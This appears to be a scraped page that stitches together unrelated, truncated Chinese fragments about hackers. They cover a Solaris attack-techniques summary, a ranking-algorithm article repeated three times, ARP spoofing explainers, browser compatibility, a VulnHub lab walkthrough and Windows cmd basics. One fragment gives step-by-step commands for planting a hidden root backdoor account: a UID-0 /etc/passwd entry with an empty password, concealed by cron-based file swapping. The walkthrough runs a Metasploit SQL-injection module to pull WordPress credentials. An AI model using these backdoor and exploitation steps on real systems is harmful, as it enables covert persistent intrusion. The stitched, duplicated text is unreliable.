hacker

本资料是 Alex Noordergraaf 企业产品的说明书 现在整理如下： 第一部分： How hackers Do It ： Tricks Tools and Techniques 本文介绍了黑客用来获取的技巧，工具和技术未经授权访问Solaris™Operating Environment（Solaris OE）系统。具有讽刺意味的是，它通常是黑客成功获取的最基本方法访问您的系统。对于本文，我们使用Solaris OE系统的默认配置进行评估哪些漏洞对入侵者最具吸引力。 使用容易获得免费软件安全工具，我们演示了黑客用来攻击的技术系统。本文中描述的所有攻击都有预防性解决方案;但是，黑客每天都会使用这些攻击来破坏系统。 意识到如何执行这些攻击，你可以提高你的意识组织建立和维护安全系统的重要性。许多组织只在错误期间解决安全问题安装，然后再也不会重新访问它。 维护安全是一个持续的过程，它是必须定期审查和重新审视的事情。使用本文中的信息，您可以尝试入侵您的组织数据中心，高端服务器或其他系统，以确定基本攻击的位置成功。 然后，您可以解决安全漏洞，以防止未经授权的用户 从攻击系统。 下面 我将删减合理的技术文档资料整理： 端口扫描： 端口扫描程序可能是Internet上最常用的扫描工具。这些工具扫描大型IP空间并报告它们遇到的系统端口可用，以及其他信息，例如操作系统类型。

catalog 1. Linux黑客帐号攻击向量 2. Linux可疑帐号检测模型 1. Linux黑客帐号攻击向量 0x1: 将黑客帐号添加到"root"组 1. useradd hacker -p hacker123 2. usermod -a -G root hacker 3. id hacker 0x2: 不使用系统指令添加系统帐号 1. vim /etc/passwd 新增一行: musicyxy:x:0:0::/:/bin/bash 2. vim /etc/shadow 新增一行: musicyxy::13407:0:99999:7::: //!wq 0x3: 基于crontab进行帐号隐藏 1. 利用crontab(计划任务)进行黑客帐号的隐藏 2. 把用于隐藏黑客帐号的伪造passwd和shadow文件备份到别的地方(例如/tmp/passwd、/tmp/shadow)，原目录(/etc/passwd、/etc/shadow)保持不变 3. 将musicyxy:x:0:0::/:/bin/sh和musicyxy::13407:0:99999:7:::两条信息追加到伪造的passwd和shadow文件中 4. 然后在每天的固定时间点将伪造的passwd、shadow文件替换到/etc/目录，并做好原始正常文件的备份，在过了这段时间窗口后，将原始正常文件还原回来 5.

作者： 阮一峰 日期： 2012年2月24日 互联网的出现，意味着"信息大爆炸"。 用户担心的，不再是信息太少，而是信息太多。如何从大量信息之中，快速有效地找出最重要的内容，成了互联网的一大核心问题。 各种各样的排名算法，是目前过滤信息的主要手段之一。对信息进行排名，意味着将信息按照重要性依次排列，并且及时进行更新。排列的依据，可以基于信息本身的特征，也可以基于用户的投票，即让用户决定，什么样的信息可以排在第一位。 下面，我将整理和分析一些基于用户投票的排名算法，打算分成四个部分连载，今天是第一篇。 一、Delicious 最直觉、最简单的算法，莫过于按照单位时间内用户的投票数进行排名。得票最多的项目，自然就排在第一位。 旧版的 Delicious ，有一个"热门书签排行榜"，就是这样统计出来的。 它按照 "过去60分钟内被收藏的次数" 进行排名。每过60分钟，就统计一次。 这个算法的优点是比较简单、容易部署、内容更新相当快；缺点是排名变化不够平滑，前一个小时还排在前列的内容，往往第二个小时就一落千丈。 二、Hacker News Hacker News 是一个网络社区，可以张贴链接，或者讨论某个主题。 每个帖子前面有一个向上的三角形，如果你觉得这个内容很好，就点击一下，投上一票。根据得票数，系统自动统计出热门文章排行榜。但是，并非得票最多的文章排在第一位，还要考虑时间因素

互联网的出现，意味着"信息大爆炸"。 用户担心的，不再是信息太少，而是信息太多。如何从大量信息之中，快速有效地找出最重要的内容，成了互联网的一大核心问题。 各种各样的排名算法，是目前过滤信息的主要手段之一。对信息进行排名，意味着将信息按照重要性依次排列，并且及时进行更新。排列的依据，可以基于信息本身的特征，也可以基于用户的投票，即让用户决定，什么样的信息可以排在第一位。 下面，我将整理和分析一些基于用户投票的排名算法，打算分成六个部分连载，今天是第一篇。 一、Delicious 最直觉、最简单的算法，莫过于按照单位时间内用户的投票数进行排名。得票最多的项目，自然就排在第一位。 旧版的 Delicious ，有一个"热门书签排行榜"，就是这样统计出来的。 它按照 "过去60分钟内被收藏的次数" 进行排名。每过60分钟，就统计一次。 这个算法的优点是比较简单、容易部署、内容更新相当快；缺点是，一方面，排名变化不够平滑，前一个小时还排名靠前的内容，往往第二个小时就一落千丈，另一方面，缺乏自动淘汰旧项目的机制，某些热门内容可能会长期占据排行榜前列。 二、Hacker News Hacker News 是一个网络社区，可以张贴链接，或者讨论某个主题。 每个帖子前面有一个向上的三角形，如果你觉得这个内容很好，就点击一下，投上一票。根据得票数，系统自动统计出热门文章排行榜。但是

目的 为了发现IP与MAC的映射。 为什么需要映射？因为在局域网是，这个时候通讯是通过交换机，MAC地址，这个时候就需要对方的MAC而不是IP了。 数据包通过交换进行转发。 简介 因为有多种网络，802.11,TCP/IP等，所有的协议在物理层上面都是相同的，上层的协议不同，这样主机就可以在多种网络上进行传输。 类似 DNS服务器提供的是域名与IP之间的映射关系。 路由表提供的是选路与网络iP之间的映射。 arp表提供的是IP与MAC之间的映射。 注意 arp提供的是动态的映射，是可能会改变的，因此，在同一局域网中，是可能被人通过arp这一特性进行而已攻击。hacker告诉chicken，通过免费arp方式告诉chicken，hacker的电脑是网关，hacker同时告诉路由器自己是chicken,然后所有的收发数据都经过hacker，hacker这个时候就可以查看这些数据，从中找到敏感信息，如密码或者网页cookie等。 使用 使用wireshark会收到免费arp以及arp广播等信息。 如果局域网里的两台计算机无法通信，很可能是因为两者没有存对面的映射，可以通过ping或者是关闭防火墙再ping的形式网络测试，通过ping之后就有了对方的arp映射，后面就可以通讯了。 来源： CSDN 作者： 502203305 链接： https://blog.csdn.net

一、ARP攻击概述 在上篇文章里，我给大家普及了ARP协议的基本原理，包括ARP请求应答、数据包结构以及协议分层标准，今天我们继续讨论大家最感兴趣的话题：ARP攻击原理是什么？通过ARP攻击可以做什么，账号是否可以被窃取？有哪些常见的ARP渗透（攻击）工具可以用来练手？ARP扫描和攻击有什么区别，底层数据包特征是怎样的？ 接下来，我们通过图解的方式来深入了解ARP攻击是如何实现的。 二、ARP攻击原理 但凡局域网存在ARP攻击，都说明网络存在"中间人"，我们可以用下图来解释。 在这个局域网里面，PC1、PC2、PC3三台主机共同连接到交换机SW1上面，对应3个接口port1/2/3。假设PC3这台主机安装了ARP攻击软件或遭受ARP病毒，成为这个网络的攻击者（hacker），接下来，PC3是如何攻击的？先不急，先来回顾下PC1和PC2是如何通信的。 ①PC1需要跟PC2通信，通过ARP请求包询问PC2的MAC地址，由于采用广播形式，所以交换机将ARP请求包从接口P1广播到P2和PC3。（注：交换机收到广播/组播/未知帧都会其他接口泛洪） ②PC2根据询问信息，返回ARP单播回应包；此时PC3作为攻击者，没有返回ARP包，但是处于"监听"状态，为后续攻击做准备。 ③PC1和PC2根据ARP问答，将各自的ARP映射信息（IP-MAC）存储在本地ARP缓存表。 ④交换机根据其学习机制

所谓的浏览器兼容性问题，是指因为不同的浏览器对同一段代码有不同的解析，造成页面显示效果不统一的情况。在大多数情况下，我们的需求是，无论用户用什么浏览器来查看我们的网站或者登陆我们的系统，都应该是统一的显示效果。所以浏览器的兼容性问题是前端开发人员经常会碰到和必须要解决的问题。 在学习浏览器兼容性之前，我想把前端开发人员划分为两类： 第一类是精确按照设计图开发的前端开发人员，可以说是精确到1px的，他们很容易就会发现设计图的不足，并且在很少的情况下会碰到浏览器的兼容性问题，而这些问题往往都是浏览器的bug，并且他们制作的页面后期易维护，代码重用问题少，可以说是比较牢固放心的代码。 第二类是基本按照设计图来开发的前端开发人员，很多细枝末节差距很大，不如间距，行高，图片位置等等经常会差几px。某种效果的实现也是反复调试得到，具体为什么出现这种效果还模模糊糊，整体布局十分脆弱。稍有改动就乱七八糟。代码为什么这么写还不知所以然。这类开发人员往往经常为兼容性问题所困。修改好了这个浏览器又乱了另一个浏览器。改来改去也毫无头绪。其实他们碰到的兼容性问题大部分不应该归咎于浏览器，而是他们的技术本身了。 这篇文章主要针对的是第一类，严谨型的开发人员，因此这里主要从浏览器解析差异的角度来分析兼容性问题 浏览器兼容问题一：不同浏览器的标签默认的外补丁和内补丁不同 问题症状：随便写几个标签

互联网的出现，意味着"信息大爆炸"。 用户担心的，不再是信息太少，而是信息太多。如何从大量信息之中，快速有效地找出最重要的内容，成了互联网的一大核心问题。 各种各样的排名算法，是目前过滤信息的主要手段之一。对信息进行排名，意味着将信息按照重要性依次排列，并且及时进行更新。排列的依据，可以基于信息本身的特征，也可以基于用户的投票，即让用户决定，什么样的信息可以排在第一位。 下面，我将整理和分析一些基于用户投票的排名算法，打算分成六个部分连载，今天是第一篇。 一、Delicious 最直觉、最简单的算法，莫过于按照单位时间内用户的投票数进行排名。得票最多的项目，自然就排在第一位。 旧版的 Delicious ，有一个"热门书签排行榜"，就是这样统计出来的。 它按照 "过去60分钟内被收藏的次数" 进行排名。每过60分钟，就统计一次。 这个算法的优点是比较简单、容易部署、内容更新相当快；缺点是，一方面，排名变化不够平滑，前一个小时还排名靠前的内容，往往第二个小时就一落千丈，另一方面，缺乏自动淘汰旧项目的机制，某些热门内容可能会长期占据排行榜前列。 二、Hacker News Hacker News 是一个网络社区，可以张贴链接，或者讨论某个主题。 每个帖子前面有一个向上的三角形，如果你觉得这个内容很好，就点击一下，投上一票。根据得票数，系统自动统计出热门文章排行榜。但是

靶机地址： https://www.vulnhub.com/entry/hacker-fest-2019,378/ 主机扫描： FTP尝试匿名登录 应该是WordPress的站点 进行目录扫描： python3 dirsearch.py http://10.10.203.17/ -e html,json,php 此外还有一个phpmyadmin http://10.10.203.17/phpmyadmin/index.php 使用wpscan扫描检测插件漏洞 wpscan --url http://10.10.203.17 msf5 > use auxiliary/admin/http/wp_google_maps_sqli msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 10.10.203.17 rhosts => 10.10.203.17 msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit [*] Running module against 10.10.203.17 [*] 10.10.203.17:80 - Trying to retrieve the wp_users table... [+] Credentials saved in:

系统管理和文件管理 systeminfo 获取系统信息 系统 补丁 网卡 path 查看环境变量 set 查看系统变量 whoami 查看当前用户是谁 hostname 查看当前主机名 mkdir 文件夹名 创建文件夹 rmdir 文件夹名 删除文件夹 cd 文件夹路径 路径：绝对路径 从当前盘符位置写的路径 相对路径 相对于某个位置的路径 . 表示当前路径 .. 表示上一级路径 dir 查看当前路径下有哪些文件或者文件夹 注意：以. .. 开头的文件、文件夹默认情况下是隐藏的 echo "nihao!" >./bxk.txt 写到当前路径 echo icq >/bxk.txt 写到根目录 type bxk.txt 读文件 del icq.txt 删文件 用户管理（管理员） net user 查看当前系统中有哪些用户 net user hacker 查看hacker用户信息 net user hacker 123.com 修改hacker密码为123.com net user 用户名 密码 /add 添加账号 注意：默认添加的账号是属于users组 / 正斜杠 \ 反斜杠 net user hacker /del 删除指定用户 net localgroup 查看本地的用户组 net lcoalgroup users 查看指定组信息 net localgroup bp /add